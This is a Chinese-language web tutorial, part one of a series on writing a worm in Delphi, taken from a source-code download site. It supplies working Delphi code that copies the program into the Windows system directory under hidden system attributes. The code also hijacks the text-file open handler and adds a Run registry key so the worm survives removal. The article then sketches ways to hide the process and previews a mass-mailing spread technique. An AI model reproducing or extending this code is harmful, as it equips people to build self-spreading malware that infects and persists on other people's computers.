| VB 源码 | VC 源码 | ASP源码 | JSP源码 | PHP源码 | CGI源码 | FLASH源码 | 素材模板 | C 源程序 | 站长工具 | 站长教程 |

黑客技术

木马病毒
黑客技术
系统安全
防火墙
安全防范

本类阅读TOP10

·五种windows密码设置及破解
·穿过局域网的我的手 内网远程控制全攻略
·不用任何软件(木马程序)盗取账号密码
·EXE、DLL文件的脱壳
·黑客技术:SQL入侵教程
·美萍的破解方法
·Windows黑客编程基础
·硬盘还原卡的破解
·win2000密码破解不完全指南
·大话网络之经典入侵技术

站内搜索

浅谈用delphi来编写蠕虫病毒(part Ⅰ)

{
  注:由于小弟水平有限,并且是小弟第一次写文章,自然难免有很多不足的地方,还请大家包涵!
 如果你有什么意见和建议,也请给我来信,大家互相学习,互相探讨!
}

前言:
可能大家想到病毒,第一反应就是可能是用asm来编写,或者是vbsript,而高级语言如delphi就好象不能编写一样,其实事实并不是这个样子的,只要我们花一些时间,照样可以写出简短而高效的病毒程序来,一点也不输那些用汇编写出来的程序哦。
一个病毒程序首先要短小,我们的目标是经过压缩后控制在30k以下。用过delphi的朋友都知道,如果在uses里面加入forms,classes.....等就会使目标文件非常的大,所以,在我们的程序里,我们要尽可能的不用这些库。我们只用windows,winsock,shellapi,sysutils(这个里面包含了一些常用的函数,比如对文件的操作,对字符串的操作,如果用自己的程序来代替,目标文件会更加的小)

首先,我们知道,一个病毒程序一般都分下面三个模块:
 ①保护模块;
 ②感染模块;
 ③发作模块。
下面我们就从这三个模块开始,分别实现他们的代码。

一)保护模块。
一般,我们都是把自身拷贝到系统的一些目录里,比如%systemroot%
那么,我们首先要取得这些特定的目录的路径
sdk里面给我们提供了一个这样的函数GetSystemDirectory
UINT GetSystemDirectory(
 LPTSTR lpBuffer,// 存放返回的字符串的缓冲区
 UINT uSize//上面的缓冲去的长度
);
相关的函数还有GetWindowsDirectory可以得到%windows%的路径

得到了系统的目录后,第二步就是拷贝文件了。sdk为我们提供了一个函数copyfile
BOOL CopyFile(
 LPCTSTR lpExistingFileName, // 源文件的路径
 LPCTSTR lpNewFileName,// 目标文件的路径
 BOOL bFailIfExists// 这是一个标志,如果目标文件已经存在,是否强制覆盖
);

拷贝文件完毕后,我们来把这个文件设置为系统和隐藏,那么一般情况是看不见该文件的,
除非选取查看所有文件,以及显示受保护文件。
同样,介绍一个函数SetFileAttributes
BOOL SetFileAttributes(
 LPCTSTR lpFileName, // 需要设置的文件的文件名
 DWORD dwFileAttributes // 设置的值。
);
我们这里要设置为隐藏和系统,那么就为第二个参数传递FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM

  下面就是最重要的,让该文件开机自动运行,我们一般都是写注册表,
首先用RegOpenKey函数来打开一个键,
LONG RegOpenKey(
 HKEY hKey, // 主键,比如HKEY_LOCAL_MACHINE
 LPCTSTR lpSubKey,// 跟随的subkey
 PHKEY phkResult// 存放函数返回这个打开的键的句柄
);
得到了HKEY后,就可以用regsetvalueex来向该键写具体的值了。
LONG RegSetValueEx(
 HKEY hKey,// 这个就是刚才我们得到的句柄
 LPCTSTR lpValueName, // 键名的地址
 DWORD Reserved,// 一般设置为0
 DWORD dwType, // 我们写的键的类型,字符串为REG_SZ
 CONST BYTE *lpData,// 键值的地址
 DWORD cbData // 写入的键值的长度
);

下面,我综合上面的说明来给出一个简短的例子:
procedure SelfCopy;
var
Path,Value:array [0..255] of char;
Hk:HKEY;
S:string;
begin
GetSystemDirectory(Path,256);
//取得系统的路径
s:=strpas(Path);
//转换成字符串
CopyFile(pchar(paramstr(0)),pchar(S+'\ruin.exe'),false);
CopyFile(pchar(paramstr(0)),pchar(S+'\virus_ruin.exe'),false);
//把自身拷贝到系统目录下为ruin.exe,virus_ruin.exe
SetFileAttributes(pchar(S+'\ruin.exe'),FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM);
SetFileAttributes(pchar(S+'\virus_ruin.exe'),FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM);
//设置刚才的两个文件为系统和隐藏
RegOpenKey(HKEY_CLASSES_ROOT,'txtfile\shell\open\command',Hk);
Value:='virus_ruin.exe %1';
RegSetValueEx(Hk,'',0,REG_SZ,@Value,17);
//把virus_ruin.exe和文本文件关联
RegOpenKey(HKEY_LOCAL_MACHINE,'Software\Microsoft\Windows\CurrentVersion\Run',Hk);
Value:='ruin.exe';
RegSetValueEx(Hk,'ruin',0,REG_SZ,@Value,8);
//设置开机自动运行ruin.exe
end;
我们看上面的这个程序,就完成了自我复制,和开机自动运行,
并且关联了文本文件,这样,如果run下的键被删除,那么他打开文本文件,蠕虫文件又被激活。
不过这个样子,你就需要在你的主程序里面进行判断,如果传递的参数等于1 ,则打开该文本,
并且进行自我保护。
如:
begin
if paramcount=1 then
shellexecute(0,'open','notepad.exe',pchar(paramstr(1)),nil,sw_normal);
//其他的代码

这里,我只是给出一个简单的例子来描述出一个大概的思路,
很多地方还不完善,比如进程的隐藏,
你可以进行判断,
如果是98你可以registerserverapplication如果你是用的2000,你可以做为服务启动,
或者是插入dll,或者是用求职信的方法,开机加载一个dll,或者是win.ini
或者.......................
因为我这里只是浅谈,只给大家提供一个思路,
如果你要深入研究,推荐看看shotgun的《揭开木马的神秘面纱》。
好今天打字也累了,明天接着写!

下回预告:利用winsock和mime漏洞发送email给缓存中的email地址




相关文章
  • 防治网络蠕虫病毒的技巧及其策略
  • 修改系统DLL文件实现禁用来防止木马病毒!
  • 计算机病毒的传染机制
  • adsl modem病毒
  • 浅谈用delphi来编写蠕虫病毒(part Ⅱ)
  • 如何利用OutLook漏洞编写病毒脚本
  • 从管理角度谈病毒与数据安全
  • 正确区分病毒与故障保障计算机系统安全运行
  • 跟我学制作“QQ尾巴病毒”
  • 三大原则--助你更有效的防止病毒侵入
  • QQ出现新病毒“QQ乐”创建自运行文件
  • 计算机病毒防治策略的11条
  • "灾飞"病毒技术分析报告
  • 微软已涉足反病毒市场?还没那么快!
  • 清除QQ尾巴类自动发消息病毒
  • 手工查杀木马病毒方法揭谜,易如反掌!
  • “QQ尾巴”病毒是如何制作的
  • 网上银行重大漏洞 病毒轻松偷帐号密码
  • 病毒疯狂来袭 “Yaha”让几万台电脑遭殃
  • 借安全漏洞 MP3蠕虫病毒网上“兴风作浪”
  • 相关软件

  • cih病毒源代码  
  • CIH病毒1.4版本之中文注释  
  • CIH病毒免疫程序  
  • 彻底清除“I Love You”病毒并介  

  • 下载首页关于我们广告服务联系方式常见问题隐私声明法律条款本站声明下载帮助发布软件站点地图谷歌卫星地图